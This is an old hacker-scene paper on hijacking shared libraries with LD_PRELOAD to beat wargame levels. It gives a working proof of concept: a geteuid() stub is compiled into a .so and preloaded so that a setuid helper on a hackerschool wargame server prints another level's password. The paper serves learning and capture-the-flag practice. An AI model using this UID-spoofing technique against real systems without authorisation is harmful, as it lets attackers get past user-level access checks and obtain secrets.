---------------------------------------------------------------------------- Title : Shared Library Hijacking For Playing Wargames Author : x90c < geinblues@gmail.com > Website : http://www.chollian.net/~jyj9782/ Best Regards Hax0r hkpco < hkpco@korea.com > ---------------------------------------------------------------------------- Shared Libary on Linux ---------------------- Shared libraries are libraries that are loaded by programs when they start. When a shared library is installed properly, all programs that start afterwards automatically use the new shared library. It's actually much more flexible and sophisticated than this, because the approach used by Linux permits you to: >> update libraries and still support programs that want to use older, non-backward-compatible versions of those libraries; >> override specific libraries or even specific functions in a library when executing a particular program. >> do all this while programs are running using existing libraries. - "Program Library HOWTO" Shared Library Hijacking ------------------------ This paper talks about what is shared library hijacking and how to test it. It's not newer to most popuar 0dayz, When i'm starting to write this paper. I can't found any article about this technique! (but not meaning 'nothing') And so i decided to discover it for many of world hax0r persons. -- Behind story -- hkpco : "I'm taking the way to get any level password of wargames using an sled now" x90c : "(hmm) what about to turn it into paper for ppls ?" hkpco : "wow that's good." x90c : (boom) (boom) (tatata) (boom).. .. To be continue .. ------ eof ------- As you may know linux's shared library feature allow us to wrap any libc(c library, also shared) 's c function. If you already know this way then you can pass this paper. Step by step how to hijack get????(), set????(): First> Make your shared library of own wrap function as 'geteuid(), getuid() and setuid() ..' Second> Compile above source code into shared object by using gcc compiler. Thrid> Copy current directory's compiled shared object into /tmp directory. Forth> Set LD_PRELOAD environment with '/tmp/'. Good.. $ To test run executables as '/bin/id', 'whoami' ..which will using your hijacked function. If you made geteuid() must be returns zero(0) value then geteuid used user-level executables believe your faked information that (you're root) so you can bypass any user-level uid checking. But it's not mean 'you are real-root' .. At least kernel know that you're not real-root. So you can't read records of /etc/shadow. Note that the LD_PRELOAD environment variable just only affact on your current shell. POC ( ftz.hackerschool.org:23 ) ------------------------------- Tested on: - RedHat 9 (Shrike) - Linux Kernel 2.4.32 - gcc 3.2.2 [level1@ftz level1]$ id uid=3001(level1) gid=3001(level1) groups=3001(level1) [level1@ftz level1]$ /bin/my-pass Level1 Password is "level1". [level1@ftz tmp]$ cat /etc/passwd|grep "level20" level20:x:3100:3100::/home/level20:/bin/bash [level1@ftz tmp]$ cat geteuid.c #include #include #include uid_t geteuid( void ) { return 3100; } [level1@ftz tmp]$ gcc geteuid.c -fPIC -shared -o geteuid.so [level1@ftz tmp]$ export LD_PRELOAD="/tmp/geteuid.so" [level1@ftz tmp]$ /bin/my-pass Level20 Password is "we are just regular guys". Reference --------- http://www.linux.org/docs/ldp/howto/Program-Library-HOWTO/shared-libraries.html